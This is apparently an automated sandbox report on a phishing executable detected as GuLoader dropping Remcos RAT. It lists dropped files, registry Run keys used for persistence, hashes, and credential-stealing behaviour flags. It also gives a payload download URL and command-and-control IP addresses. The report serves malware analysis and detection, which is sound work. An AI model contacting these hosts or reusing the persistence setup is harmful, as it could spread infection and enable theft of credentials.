              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447831 Sample: INQUIRY#46789-MAY_24_PRODUCTS.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 45 geoplugin.net 2->45 59 Multi AV Scanner detection for dropped file 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 Yara detected GuLoader 2->63 65 3 other signatures 2->65 10 INQUIRY#46789-MAY_24_PRODUCTS.exe 2 52 2->10         started        13 Vexploio.exe 16 2->13         started        signatures3 process4 file5 43 C:\Users\user\AppData\Local\...\System.dll, PE32 10->43 dropped 15 INQUIRY#46789-MAY_24_PRODUCTS.exe 3 12 10->15         started        process6 dnsIp7 51 66.63.169.15, 50594, 50595, 80 ASN-QUADRANET-GLOBALUS United States 15->51 37 C:\Users\user\AppData\...behaviorgrapheofaglig.exe, PE32 15->37 dropped 39 C:\ProgramData\Vexplo\Vexploio.exe, PE32 15->39 dropped 53 Detected Remcos RAT 15->53 55 Creates autostart registry keys with suspicious names 15->55 57 Creates multiple autostart registry keys 15->57 20 Vexploio.exe 25 15->20         started        file8 signatures9 process10 file11 41 C:\Users\user\AppData\Local\...\System.dll, PE32 20->41 dropped 67 Multi AV Scanner detection for dropped file 20->67 69 Detected unpacking (changes PE section rights) 20->69 24 Vexploio.exe 4 16 20->24         started        signatures12 process13 dnsIp14 47 geoplugin.net 178.237.33.50, 50599, 80 ATOM86-ASATOM86NL Netherlands 24->47 49 64.188.26.202, 1604, 50596, 50597 ASN-QUADRANET-GLOBALUS United States 24->49 71 Detected Remcos RAT 24->71 73 Tries to harvest and steal browser information (history, passwords, etc) 24->73 75 Writes to foreign memory regions 24->75 77 2 other signatures 24->77 28 Vexploio.exe 24->28         started        31 Vexploio.exe 24->31         started        33 Vexploio.exe 24->33         started        35 26 other processes 24->35 signatures15 process16 signatures17 79 Tries to steal Instant Messenger accounts or passwords 28->79 81 Tries to steal Mail credentials (via file / registry access) 28->81 83 Tries to harvest and steal browser information (history, passwords, etc) 31->83

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              INQUIRY#46789-MAY_24_PRODUCTS.exe29%VirustotalBrowse
              INQUIRY#46789-MAY_24_PRODUCTS.exe24%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\ProgramData\Vexplo\Vexploio.exe24%ReversingLabs
              C:\ProgramData\Vexplo\Vexploio.exe29%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsd31E2.tmp\System.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\nsv9D4E.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsv9D4E.tmp\System.dll0%VirustotalBrowse
              C:\Users\user\AppData\Roaming\bloue\Geofaglig.exe24%ReversingLabs
              C:\Users\user\AppData\Roaming\bloue\Geofaglig.exe29%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              geoplugin.net0%VirustotalBrowse
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              178.237.33.50
              truefalse
              NameMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gpfalse
                http://66.63.169.15/TBdmQwySFr136.binfalse
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.google.com/accounts/serviceloginVexploio.exefalse
                    https://login.yahoo.com/config/loginVexploio.exefalse
                      http://nsis.sf.net/NSIS_Errorsvchost.exefalse
                        http://nsis.sf.net/NSIS_ErrorErrorINQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000000.177982856555.000000000040A000.00000008.00000001.01000000.00000004.sdmp, INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmp, INQUIRY#46789-MAY_24_PRODUCTS.exe, 00000005.00000000.178114881333.000000000040A000.00000008.00000001.01000000.00000004.sdmp, Vexploio.exe, 00000006.00000002.178534922602.000000000040A000.00000004.00000001.01000000.00000008.sdmpfalse
                          http://www.nirsoft.net/Vexploio.exefalse
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            66.63.169.15
                            unknownUnited States
                            8100ASN-QUADRANET-GLOBALUSfalse
                            178.237.33.50
                            geoplugin.netNetherlands
                            8455ATOM86-ASATOM86NLfalse
                            64.188.26.202
                            unknownUnited States
                            8100ASN-QUADRANET-GLOBALUSfalse
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1447831
                            Start date and time:2024-05-27 09:05:21 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 22m 57s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:40
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:INQUIRY#46789-MAY_24_PRODUCTS.exe
                            Detection:MAL
                            Classification:mal100.phis.troj.spyw.evad.winEXE@79/30@1/3
                            EGA Information:
                            • Successful, ratio: 83.3%
                            HCA Information:
                            • Successful, ratio: 92%
                            • Number of executed functions: 154
                            • Number of non-executed functions: 254
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe, TextInputHost.exe
                            • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com
                            • Execution Graph export aborted for target INQUIRY#46789-MAY_24_PRODUCTS.exe, PID 7960 because there are no executed function
                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            TimeTypeDescription
                            03:08:51API Interceptor22405785x Sleep call for process: Vexploio.exe modified
                            08:07:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce grewm C:\Users\user\AppData\Roaming\bloue\Geofaglig.exe
                            08:07:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-RXKA3P "C:\ProgramData\Vexplo\Vexploio.exe"
                            08:08:03AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Rmc-RXKA3P "C:\ProgramData\Vexplo\Vexploio.exe"
                            08:08:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce grewm C:\Users\user\AppData\Roaming\bloue\Geofaglig.exe
                            08:08:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-RXKA3P "C:\ProgramData\Vexplo\Vexploio.exe"
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):424184
                            Entropy (8bit):7.730132782946701
                            Encrypted:false
                            SSDEEP:6144:Y7eCdHpEMIeSdeNuUeOR7LTmlE8uf58dnABhc+Ku5hygOdtUwj0TnmuqXdG:6PNAd7nOtS4EJi5hygoRu6Xw
                            MD5:B0058626C77841FEA067AA436FF4F1E7
                            SHA1:CB42FD42E35FFAAB9EB7000F0E3DF59C2BA4EC7A
                            SHA-256:0459C020742F5356D25D14F2CD937ECEE923A54402246DC521452A6C9B353119
                            SHA-512:76CAEF3EBCDE654C9237110A632C4ACB1397843AEE53FBFF73D6686233D0FCE0FFAE12AB2764ABEA3FC8426379F306BC65CCDEC4D9FDA468D300FCB5054D74C3
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            • Antivirus: Virustotal, Detection: 29%, Browse
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...)..\.................d...|.......2............@.......................................@.................................<...........h............................................................................................................text....b.......d.................. ..`.rdata..\............h..............@..@.data....U...........|..............@....ndata...................................rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Reputation:unknown
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\ProgramData\Vexplo\Vexploio.exe
                            File Type:JSON data
                            Category:modified
                            Size (bytes):989
                            Entropy (8bit):5.017386695337996
                            Encrypted:false
                            SSDEEP:12:tkEgnd6UGkMyGWKyGXPVGArwY3yGhsp+axH0sp+GYArpv/mOAaNO+ao9W7iN5zzF:qrdVauKyGX852sesPvXhNlT3/75ciWro
                            MD5:599B58DF4ACFCA26C0795C9D75AA099C
                            SHA1:296BA1D075ED53C465850DD76B5605467B14616C
                            SHA-256:1F7561EA9C51CF28876F2B101CB626E27FC3CFFF78A9318A89A2CB7A78705F17
                            SHA-512:1415C24EF425C635C618C5946B4ED2FC7E33A0002386594F5E4591550D70CE6628364291CA065FD94CD73B985286D9D1DD9F1F3BA04E71A67A8F035C602174CB
                            Malicious:false
                            Reputation:unknown
                            Preview:{. "geoplugin_request":"102.165.48.88",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Washington",. "geoplugin_region":"District of Columbia",. "geoplugin_regionCode":"DC",. "geoplugin_regionName":"District of Columbia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"38.894",. "geoplugin_longitude":"-77.0365",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):39
                            Entropy (8bit):3.994004065616087
                            Encrypted:false
                            SSDEEP:3:bMQGHbS9n:fG7Gn
                            MD5:DC764DAEA004E907E2A4076DC2E81DCE
                            SHA1:64CC2F14C8426031E8FE9995DA24887FF5BEEC97
                            SHA-256:8A3DD54ACAC47298AFA45E7048A9297F897E35CB351E511FBE5A421B1ED6523D
                            SHA-512:F03E8C65E1974E8BC1608E292A9898054C791B5E8505B8BBD5F9EB832CD414C3FB19F7E328286984CC73A07937D60731DD00F20C3E31DB77245A2F178E5BF257
                            Malicious:false
                            Reputation:unknown
                            Preview:[substantify]..praisably=intransitive..
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):51
                            Entropy (8bit):4.7896890672920085
                            Encrypted:false
                            SSDEEP:3:ayWFXQLQIfLBJXlFGfv:bmXQkIPeH
                            MD5:F09045A90C78C38BE8C9CBABC14C5AF5
                            SHA1:0EC854B7F04157763C40DCB430DE981380BA82CF
                            SHA-256:EB547F6C09B10F5824FA51272FE7EBDA82A2942209E8C795250A3A71A73789E3
                            SHA-512:E10CA8614F3BD2FED1CFD752FCED2754853DA013CBA37E9258F03ECA34F5C0E9DA524989E5234349935D9BA47CF63034D73A8275D61EB9B4B7D1D90531F9981C
                            Malicious:false
                            Reputation:unknown
                            Preview:[Loading]..Startup=user32::EnumWindows(i r2 ,i 0)..
                            Process:C:\ProgramData\Vexplo\Vexploio.exe
                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3f8c9537, page size 32768, DirtyShutdown, Windows version 10.0
                            Category:dropped
                            Size (bytes):41943040
                            Entropy (8bit):1.32511535688971
                            Encrypted:false
                            SSDEEP:24576:K3zsCwrgl64TtPpfY9MkJvBzBMPfUU8mrM8mVPSDQgGE3g9jojFg/Ja7gxuXu2Iw:1rghLfY9lXhSDQgGxYXu2
                            MD5:CE0EA8BFA7719151EB79346B3A8AEB70
                            SHA1:A3BF3D832377716D413E59C6C521296ED26FFD64
                            SHA-256:367BBAC9F3B9F1B177184AB3E2223A19BC692C6409F2A269F08FF03CD4DA9CFD
                            SHA-512:73B073A6AE3754257767BD7D7FB7A41A717967E52AAAEE3CB519D36BB8D1722F2E3983D4DC1B7CA7013DCFB9E649B0E657F44BE661EA5A73480566B51614344A
                            Malicious:false
                            Reputation:unknown
                            Preview:?..7... ....................*...y......................d.H.@........|U......|G.h.J.@.........................Be ....y7.........................................................................................................bJ......n...............................................................@...@....................................... ............|I.............................................................@...........................................................................................................................N...:....y!.................................i..f.....|G.................U..7.....|G.................@........#......h.J.@...................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\ProgramData\Vexplo\Vexploio.exe
                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                            Category:dropped
                            Size (bytes):2
                            Entropy (8bit):1.0
                            Encrypted:false
                            SSDEEP:3:Qn:Qn
                            MD5:F3B25701FE362EC84616A93A45CE9998
                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                            Malicious:false
                            Reputation:unknown
                            Preview:..
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):11776
                            Entropy (8bit):5.825582780706362
                            Encrypted:false
                            SSDEEP:192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
                            MD5:FBE295E5A1ACFBD0A6271898F885FE6A
                            SHA1:D6D205922E61635472EFB13C2BB92C9AC6CB96DA
                            SHA-256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
                            SHA-512:2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....~.\...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\ProgramData\Vexplo\Vexploio.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):11776
                            Entropy (8bit):5.825582780706362
                            Encrypted:false
                            SSDEEP:192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
                            MD5:FBE295E5A1ACFBD0A6271898F885FE6A
                            SHA1:D6D205922E61635472EFB13C2BB92C9AC6CB96DA
                            SHA-256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
                            SHA-512:2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Reputation:unknown
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....~.\...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):25
                            Entropy (8bit):4.163856189774724
                            Encrypted:false
                            SSDEEP:3:+gMn:8
                            MD5:ECB33F100E1FCA0EB01B36757EF3CAC8
                            SHA1:61DC848DD725DB72746E332D040A032C726C9816
                            SHA-256:8734652A2A9E57B56D6CBD22FA9F305FC4691510606BCD2DFCA248D1BF9E79C7
                            SHA-512:D56951AC8D3EB88020E79F4581CB9282CA40FAA8ADC4D2F5B8864779E28E5229F5DFE13096CF4B373BBC9BC2AC4BFC58955D9420136FB13537F11C137D633C18
                            Malicious:false
                            Reputation:unknown
                            Preview:[Caps]..Setting=Enabled..
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1918
                            Entropy (8bit):4.866117324562928
                            Encrypted:false
                            SSDEEP:48:tcSw5sLkgw4mnWWIFDXB5yZknRnYSPv0w1s68BUmN:tcDSrgPWbB5vnRNPMys62Uq
                            MD5:F5FA64BA1796D441E9069D66EAC986C9
                            SHA1:D1A07F8E72F9DDEAB1CEA5AE64068C92483F9237
                            SHA-256:DCADA90E85DDF4B55AFA174DA586C17DBD970C76801A526FBBFC4C73C8619E17
                            SHA-512:0BB8BE2340B996061B92E7C004A301852208428961FFDCEC6909872B21E3C68D3672CEFC07231D6E05ED80A0395CA32381CF557043E76BBBD1DA1C78020AB89E
                            Malicious:false
                            Reputation:unknown
                            Preview:.....H.74....j......J.........7....l..........N.4..........t.............s.kO...H.z..J.)b.....L......v.;.$......F..C.5.p:J...................q.....{....X.....-......;....`......{z...)...`..."...........8.....$..P...?.....................j.L..@......@........x..........F.............=......,..........s......r.j........W.x1......4............X...m..S..V..|.c.."...h.........q'......e.2....:..........j.....AB......A...\"..F........ .....>..v....T....o..%b.X.X....6..g)...'..F...o........ $X......9.0G... ..{..t...#p!P2....S....._..,n.X..........o.....s..3....H..|*....#.9..5...~...U......@p.........gL..o..<......*..XD.$.....D.f..U.....`...........M....%..%O..q...._.....K...}.............8...I....".t.............R..L.......9.......?....z.../.....k].Ne..o.6.....y..%.....R......j.....Dp.........#.d.1...V.......J..........W..3..5.I..........2.......u..................ME.......!......O.........).F...f..{..k....z.<,........P...e1.......i.....=*._.......,........'.d.........<...W......".
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):264628
                            Entropy (8bit):7.53863132127154
                            Encrypted:false
                            SSDEEP:6144:sIXUvVuDkaVl4354tlXdRxv7WEguNdTKN:bUtBaS4zXZjVNlKN
                            MD5:A60D5243503CE3D8677296D8C042C78F
                            SHA1:36FB22995A0BC9ADE5C13A87ACC6E2D5B531FD20
                            SHA-256:63CA6FF90BC680818CBB3419B66129640F95FE8F82523C8AEF0193EB8E5E63DF
                            SHA-512:625FFB14857065F3BFD7339A5C7B0C9FCF80696179A28E3AFFD92A97A919A8D23736833802C163AAA763A590099B10F8949CCE8783059F4F66380983744E4361
                            Malicious:false
                            Reputation:unknown
                            Preview:........xxx.B...q...........SS..................K.........\\\..................bbb........<<............0....*.....t..........[......bbbb............MM.......b.8888..........7........[[......ttt.............................=====..j..........yy.............--..q...........M..)..........cccc.....LLL.....~....aa......88.........................................v..q......GG.W.......~....????....A.............cc............??...@............y.............o.........[.PP..........D..mm.....444444.j.S...................x..t..........L..s.*....................H...[[[............................b........................44.....".........R.AAA.*......a...xxxx....|.u............"".........l.......(((.....e...HHH..........X..............................o.GGGG......hh.---............888.........==...yyy..g....E........................n.........4..............A..q........................,..........}.88888.....6.........................oo......................pp..??...........?.QQ.ss./.lll........C.....
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4409
                            Entropy (8bit):4.998325107222196
                            Encrypted:false
                            SSDEEP:96:Z8NR23i27mHC6ldsqGicLJ4YmJjKMt6kG7MK/e4:ZuR23yCAcPajB6V7MKT
                            MD5:FE67CBDFC33E4BCA1D5DE148DFD4CCA7
                            SHA1:601B7664814ACEA408AA7BBB121D5BB26301DB57
                            SHA-256:67CEA0A0C921025E558737D5BB54EAD4D0E795AD3D9688A87D18C3531C9A9A10
                            SHA-512:E3B9871379906B4ACB92B71A67CD85BEC1DC490CB710E39335A34DCA7DC1DD9B05F80AC8A4201C6BCB115A76E3E439134745CB08D59F111F6FC44B6DCBFD06C7
                            Malicious:false
                            Reputation:unknown
                            Preview:.........p}...c..3.............4......4f..=P+.....t.........H........."..G.!7...8........eO..T......C.......2.^m..........~...#..w.............k4..7.............6.........T+.\+....................,.l...~..........._..,...G............".A..................C.Ai*......0...[...K....]...........1.........'....9.....W........\F...^..............p...v.d{.y.. ...<...|.6....P.....*........p..t8......4...!.*......@...f......S.........[.t.t.....@................Sm...K.....}...Z...;.D.b..;ph..7...."...............W.......7......K....-.....Vn..Q..h.......M.......B5..,m.d...t..W.N........./..w....%...V....G...5......~&+.....86....k..L..Q..... QcJp................g....-.B.....Q...............S..-.l.......@............d(./.....u...0U...}m........m.......u.....B<.....................<.g................X.j.......f..F.....p0.{..r........]......N...A.9m..*..........4=.s..........`E.&....t...........O.).R......J...................Ml.......9......|...................`.&h/.....&..2.-........L........
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2532
                            Entropy (8bit):4.9678315283199135
                            Encrypted:false
                            SSDEEP:48:ufsILXIGNP20GjA52PD7Iy6o7dX3bDUiRaGCi0yy2WoHBF5d:ufsI8GN+0sAoPDs7mX3PFRoVoHz
                            MD5:C6878D37B9258F8AF8406998E372374A
                            SHA1:0C98231F7395C3BADD802AF8B6F54759D042B778
                            SHA-256:D1437C6D99ED6EEF50164DC663DF24DF9E67783900A605B804EFB3728EEDCD69
                            SHA-512:B291DFCF1EEB22C04EDAF4B43AC1AE88B69AB1E4AED7AAA55EFAB1951B6F64BB395C8242874AF449C036AD1A2C63CB0364943C03F096FA20F4A1B3C571A846DC
                            Malicious:false
                            Reputation:unknown
                            Preview:..........ED.....w....g....=>.70}..l....{h........................y..N....>.....j......f...b...u}.X^.@..W...@.....y..u.....Qs........$...9.....NO...m...[....Y...g...-.....s.}.......@..a.....Z...j.......R..........6.v.........]......_.........!.a........../.1.T......Z.........jg.<........;...............f..j........MM.\.7#..........".......yH........z...........)...S.z........3.[.....1h.}"3UZ...^...O..}...........)....o.........F....{.........G.....9.e.....M.6D....fm......K..g.C..g......e....~..............t......&....7..................._/.........o.r............7.........}h...8..............!t..".t..........h...z.)..?......Q...........................q......+.J...~..+.u..X..S.`........E.Yq%....g...6...........j....X....MO.........m...c...z6..W...Q.....|D..)......".............8..........#...t.7....c............"v................................_.\P........O...I.Y@.-.1L...m*F......q.h......{........QD.4..c....3.............K........9......>................&.k>
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):3100
                            Entropy (8bit):4.748208227621493
                            Encrypted:false
                            SSDEEP:96:0+WozLtosUl81/8yuN9lvcoE5B9+crXOL:0+W0Pf1UysE/H9A
                            MD5:175C8E8CBBA4FEE420E7131DEFEE9C57
                            SHA1:ED7CA0AC22608E41CEBE91020026F4C7E30B5A42
                            SHA-256:DE842BB06394A7859D97C6188D1AFA217F10784A1F564EB3E0140C94FFC90048
                            SHA-512:7B88A23A4B8D767A33987478B64F73EC8DEF254042F1C3A12F0120A85DC6E072DCF641709FAA858AECD52425419FCD04B1D26AB06B18106ED436DDD7A93BEAE8
                            Malicious:false
                            Reputation:unknown
                            Preview:......K.....X....~..........W..V........Z.........2O.V...../.................4.....I..G.!Y....-.e.......W.....6..........\`y...*.....(.`W........T.........p....?..o.d*^.......?A........^3h?x...... ..u......w........-.....#...B>.v.....6....n.\......L..Z...~P..................f.H./..........lw=.....6..........................|..h..zP...)p.....B.........C.......Y.M.........X.....P...].v{7...8a.....c.....CX.|J,..........O.}U\.K..ID.(..J..k.&..............$......e..F...w......S...%....9...g...1.....y&.*............@0/........?O.Q....s......................f.=.......................,.................}............l....|...!S....#...F..j.......k4>...R.Q.*=.........\)............+....$...............G..8....<....>...|?7.....'..............2...........s......n...O...;....]....;..8.l..!.5B@.............................{........C........d...............#.....l./....#.......-.4.WG......C...."[................#..........N.^..`..X.......]..W..{...3u.z..<..G....K........K.....!......C..
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):7510
                            Entropy (8bit):4.91720718259004
                            Encrypted:false
                            SSDEEP:192:fpfdSEMUTMZjVLoPmnXD3/gCu1G5xa8sAiN4Ce:fNdSTUYz8Pm74Cgc48VtV
                            MD5:3C54B9521872A75B7FF9C08D5F58FC2C
                            SHA1:1C8A2A51E9A78B8E1F7E91B59A3AA4D9301095CB
                            SHA-256:7817A04E5EC98E43939698025A2133653F287290223320F237C12C1D3B6B126C
                            SHA-512:F121270D58F6F04BF57B6A86061CCACFACA783800A43DA56EDE010B22542DF9553C237445C4E86E8D812F090D2255CD1B6540B87B25543B6BFE2DAFAF413E0D3
                            Malicious:false
                            Reputation:unknown
                            Preview:.,.......z.*....z..$........jK.J.w...._f...3.....<.m........!.............#..4.#..........c...40....u.~.wo......Y.......$e.()<..........................f..L...h..Q.......I.............q.J>....).....r._.el..........`....BU....1......mO....".9....I[U-.F.......[......H............Ye~...........6..............N.W....@...|.....i..........B.......<bu..a....XX....;...W........s....uI.(.}..-.....]..A...j........."...J........c.......X.....................+.............n.......?...........T.....E........2........$...............9.A3.....2..............\.].k.Z.8.......Y.;......!.............................F...?............................w.m.........o........>.h...........0Y............?. ...V...........w.........z.........`.....4..,...'.........z..........2..............V......i...D.....[....X....5..........}.E..........=.E...F..a1O...........A.+...........c....$. M.......................4X......z......j.P.)...g..............B..S../..G...6d.....0.{.....*.....#.......]....7..G....V..
                            Process:C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):14713
                            Entropy (8bit):4.934954013154932
                            Encrypted:false
                            SSDEEP:192:P15IKag1z48yfTvHm1GpudD2DrxwmUnagvnp4xzaM8QIbpU3NbiLghghkLm:NJX88yKQpuUa31fpfM8QHGgWv
                            MD5:4F98614616B284CB3F6BE2259A3BAA26
                            SHA1:C750B5F26D0663189B089D2FE799F085E533B90C
                            SHA-256:9E0410CA591D013A22A483F132A6B42E66D799953F4B4450AA42B02015B93CFA
                            SHA-512:C5FB64F244D4A41D35AA00F5991004F03C621264885ED9E4748799F7B7E15A8C1DDD2BFD32A75CAB8C350ACE2AD7C3CEB2BAEF375E2B660E8927F9D863CA2E7B
                            Malicious:false
                            Reputation:unknown
                            Preview:......<.........../s......l..!..........X...A........)...i.......E...>....P........B................U.............................&..........A...E........'.......T....=.......E.........<}.F...................V........\....D.....R..........w..]^.o.G....>..........$...fp..@.......9.........k..$..........`..............+./.p.z6.........................M.)................................=......K.?.VGk...._.......>.......~..c....0..4.....9..........U....#.......".T......q..St.......Y....eZ................................<j........#...;.N.....d.......J....k:.'....{.........y........!u........!.............0r....1..8....u..R..iV....O......;.........I...1....d....G..".d.~?..................7...'.a....~..Dk.F.%........L.....j........9W...........=...l..-.<=...Z....!2.{..S..z.......?..m..................x..$.{....9...L............N.........8.G!.P..Y.........Y.......e.......KY..m.............].z......A.......n.o.........L.....&E.....U.........f.....+....e....h..|K.8.....Xd..........zL..
